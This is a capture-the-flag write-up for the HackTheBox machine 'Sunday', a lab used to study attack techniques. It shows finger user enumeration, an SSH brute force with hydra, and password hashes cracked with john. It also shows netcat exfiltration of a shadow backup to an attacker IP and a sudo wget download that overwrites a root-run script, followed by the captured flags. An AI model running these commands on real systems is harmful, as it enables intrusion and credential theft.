HackTheBox Sunday
Writeup for HackTheBox Sunday
Machine Synopsis
Sunday is a fairly simple machine, however it uses fairly old software and can be a bit unpredictable at times. It mainly focuses on exploiting the Finger service as well as the use of weak credentials. (Source)
Key exploitation techniques:
- Finger service user enumeration
- SSH brute-force with weak credentials
sudomisconfiguration with a root-executable script- File overwrite vulnerability for root shell
Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
$ nmap -p- 10.10.10.76 --max-retries 0
PORT STATE SERVICE
79/tcp open finger
515/tcp open printer
6787/tcp open smc-admin
22022/tcp open unknown
$ nmap -sC -sV -A -p 79,515,6787,22022 10.10.10.76
PORT STATE SERVICE VERSION
79/tcp open finger?
| fingerprint-strings:
| GenericLines:
| No one logged on
| GetRequest:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| HTTPOptions:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| OPTIONS ???
| Help:
| Login Name TTY Idle When Where
| HELP ???
| RTSPRequest:
| Login Name TTY Idle When Where
| OPTIONS ???
|_ RTSP/1.0 ???
|_finger: ERROR: Script execution failed (use -d to debug)
515/tcp open printer
6787/tcp open ssl/smc-admin?
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=sunday
| Subject Alternative Name: DNS:sunday
| Not valid before: 2021-12-08T19:40:00
|_Not valid after: 2031-12-06T19:40:00
22022/tcp open ssh OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
|_ 256 da:2a:6c:fa:6b:b1:ea:16:1d:a6:54:a1:0b:2b:ee:48 (ED25519)
The scan identified an open finger service (79/tcp) and SSH on a non-standard port (22022/tcp).
The finger service was used for user enumeration. finger-user-enum.pl was employed with a common username wordlist.
1
2
3
4
5
6
7
# Enumerate users using finger-user-enum.pl
$./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76
...
root@10.10.10.76: root Super-User console <Dec 19, 2021>..
sammy@10.10.10.76: sammy ssh <Apr 13 13:38> 10.10.14.13 ..
sunny@10.10.10.76: sunny ssh <Apr 13 13:52> 10.10.14.13 ..
...
sammy and sunny were identified as valid users. Further finger queries provided basic information for these users.
1
2
3
4
5
6
7
$ finger sammy@10.10.10.76
Login Name TTY Idle When Where
sammy ssh <Apr 13 13:38> 10.10.14.13
$ finger sunny@10.10.10.76
Login Name TTY Idle When Where
sunny ssh <Apr 13 13:52> 10.10.14.13
Looks like there are 2 user accounts that we can play with!
Lets get the information of these users using finger.
1
2
3
4
5
6
7
$ finger sammy@10.10.10.76
Login Name TTY Idle When Where
sammy ??? ssh <Apr 13 13:38> 10.10.14.13
$ finger sunny@10.10.10.76
Login Name TTY Idle When Where
sunny ??? ssh <Apr 13 13:52> 10.10.14.13
Exploitation
SSH Brute-Force (sunny)
hydra was used to brute-force the SSH password for sunny on port 22022 with rockyou.txt.
1
2
3
4
$ hydra -l sunny -P /usr/share/wordlists/rockyou.txt 10.10.10.76 ssh -s 22022 -f
...
[22022][ssh] host: 10.10.10.76 login: sunny password: sunday
...
The password sunday was found for sunny. SSH access was gained.
1
2
3
4
$ ssh sunny@10.10.10.76 -p 22022
(sunny@10.10.10.76) Password:sunday
...
sunny@sunday:~$
Privilege Escalation
Sudo /root/troll Abuse (root)
Initial sudo -l as sunny revealed a NOPASSWD entry for /root/troll.
1
2
3
sunny@sunday:~$ sudo -l
User sunny may run the following commands on sunday:
(root) NOPASSWD: /root/troll
Executing /root/troll showed it was a simple script that printed “testing” and then uid=0(root) gid=0(root), indicating it was indeed running as root, but not providing a shell.
1
2
3
sunny@sunday:~$ sudo /root/troll
testing
uid=0(root) gid=0(root)
Enumeration of the /backup directory revealed shadow.backup and agent22.backup.
1
2
3
4
5
6
sunny@sunday:~$ ls -la /backup
total 28
drwxr-xr-x 2 root root 4 Dec 19 2021 .
drwxr-xr-x 25 root sys 28 Jul 24 11:09 ..
-rw-r--r-- 1 root root 319 Dec 19 2021 agent22.backup
-rw-r--r-- 1 root root 319 Dec 19 2021 shadow.backup
shadow.backup contained password hashes, including one for sammy. This file was exfiltrated via netcat.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
sunny@sunday:/backup$ cat shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
# On attacker, set up listener
$ nc -l -p 1234 > shadow.backup
# On target, send file
sunny@sunday:/backup$ nc -w 3 10.10.14.5 1234 < shadow.backup
john was used to crack the hashes in shadow.backup.
1
2
3
4
5
$ john --wordlist=/usr/share/wordlists/rockyou.txt shadow.backup
...
sunday (sunny)
cooldude! (sammy)
...
The password cooldude! was found for sammy. su to sammy was successful.
1
2
3
sunny@sunday:~$ su sammy
Password: cooldude!
sammy@sunday:~$
sudo -l as sammy revealed (ALL) ALL and (root) NOPASSWD: /usr/bin/wget.
1
2
3
4
sammy@sunday:~$ sudo -l
User sammy may run the following commands on sunday:
(ALL) ALL
(root) NOPASSWD: /usr/bin/wget
This sudo permission on wget was a powerful privilege escalation vector. Further investigation was needed to understand how /root/troll was being reset. Using ps aux and sudo wget -i /lib/svc/method/overwrite (which attempts to read the file as a URL, revealing its content in error messages), it was discovered that /root/troll was being overwritten from /root/troll.original by a service method script.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
sammy@sunday:~$ ps aux
USER PID %CPU %MEM SZ RSS TT S START TIME COMMAND
...
root 119 0.0 0.212544 3160 ? S 11:08:59 0:00 /usr/bin/bash /lib/svc/method/overwrite
...
sammy@sunday:~$ sudo wget -i /lib/svc/method/overwrite
/lib/svc/method/overwrite: Invalid URL http://#!/usr/bin/bash: Invalid host name
/lib/svc/method/overwrite: Invalid URL /usr/gnu/bin/cat /root/troll.original > /root/troll: Scheme missing
/lib/svc/method/overwrite: Invalid URL /usr/gnu/bin/sleep 5: Scheme missing
--2022-07-24 12:33:51-- http://while%20true;%20do/
Resolving while true; do (while true; do)... failed: temporary name resolution failure.
wget: unable to resolve host address 'while true; do'
--2022-07-24 12:33:51-- http://done/
Resolving done (done)... failed: temporary name resolution failure.
wget: unable to resolve host address 'done'
The strategy was to replace /root/troll.original with a malicious script using sudo wget -O.
A simple bash script (troll) containing bash was created and hosted on the attacking machine.
1
2
3
4
5
6
7
# troll content
#!/usr/bin/bash
bash
# On attacker, host script
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
The malicious troll script was then downloaded and saved as /root/troll.original using sudo wget.
1
sammy@sunday:~$ sudo wget http://10.10.14.5/troll -O /root/troll.original
After a short wait for the service method to execute the overwrite, sudo /root/troll was executed, granting a root shell.
1
2
sammy@sunday:~$ sudo /root/troll
root@sunday:/home/sunny#
The user.txt and root.txt flags were retrieved.
1
2
3
4
root@sunday:/home/sammy# cat /home/sammy/user.txt
a3d9498027ca5187ba1793943ee8a598
root@sunday:/home# cat /root/root.txt
fb40fab61d99d37536daeec0d97af9b8